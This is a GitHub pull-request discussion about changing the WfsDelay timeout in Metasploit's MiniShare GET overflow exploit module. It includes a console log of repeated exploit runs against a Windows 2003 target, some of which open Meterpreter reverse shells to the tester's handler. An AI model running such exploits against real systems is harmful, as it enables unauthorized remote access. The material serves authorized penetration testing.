Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update minishare_get_overflow.rb #4974

Merged
merged 1 commit into from Mar 20, 2015
Merged

Update minishare_get_overflow.rb #4974

merged 1 commit into from Mar 20, 2015

Conversation

adamziaja
Copy link
Contributor

set WfsDelay 30

@wvu
Copy link
Contributor

wvu commented Mar 20, 2015

WfsDelay is already an advanced option. Is this necessary in most cases or just for the particular setup you were testing? Changing a default needs a good reason.

@adamziaja
Copy link
Contributor Author

msf exploit(minishare_get_overflow) > set target 5
target => 5
msf exploit(minishare_get_overflow) > set WfsDelay 0
WfsDelay => 0
msf exploit(minishare_get_overflow) > exploit

[*] Started reverse handler on 1.3.3.7:443 
[*] Trying target address 0x77403680...
msf exploit(minishare_get_overflow) > set WfsDelay 5
WfsDelay => 5
msf exploit(minishare_get_overflow) > exploit

[*] Started reverse handler on 1.3.3.7:443 
[*] Trying target address 0x77403680...
msf exploit(minishare_get_overflow) > set WfsDelay 10
WfsDelay => 10
msf exploit(minishare_get_overflow) > exploit

[*] Started reverse handler on 1.3.3.7:443 
[*] Trying target address 0x77403680...
[*] Sending stage (770048 bytes) to 1.3.3.6
[*] Meterpreter session 1 opened (1.3.3.7:443 -> 1.3.3.6:1060) at 2015-03-21 00:15:59 +0100

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 1.3.3.6 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(minishare_get_overflow) > set WfsDelay 5
WfsDelay => 5
msf exploit(minishare_get_overflow) > exploit

[*] Started reverse handler on 1.3.3.7:443 
[*] Trying target address 0x77403680...
msf exploit(minishare_get_overflow) > set WfsDelay 10
WfsDelay => 10
msf exploit(minishare_get_overflow) > exploit

[*] Started reverse handler on 1.3.3.7:443 
[*] Trying target address 0x77403680...
[*] Sending stage (770048 bytes) to 1.3.3.6
[*] Meterpreter session 2 opened (1.3.3.7:443 -> 1.3.3.6:1062) at 2015-03-21 00:17:20 +0100

meterpreter >

so set WfsDelay 10 work fine too for Windows 2003 SP1 English :)

@wvu wvu self-assigned this Mar 20, 2015
wvu added a commit to wvu/metasploit-framework that referenced this pull request Mar 20, 2015
@wvu wvu merged commit 921b9ea into rapid7:master Mar 20, 2015
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants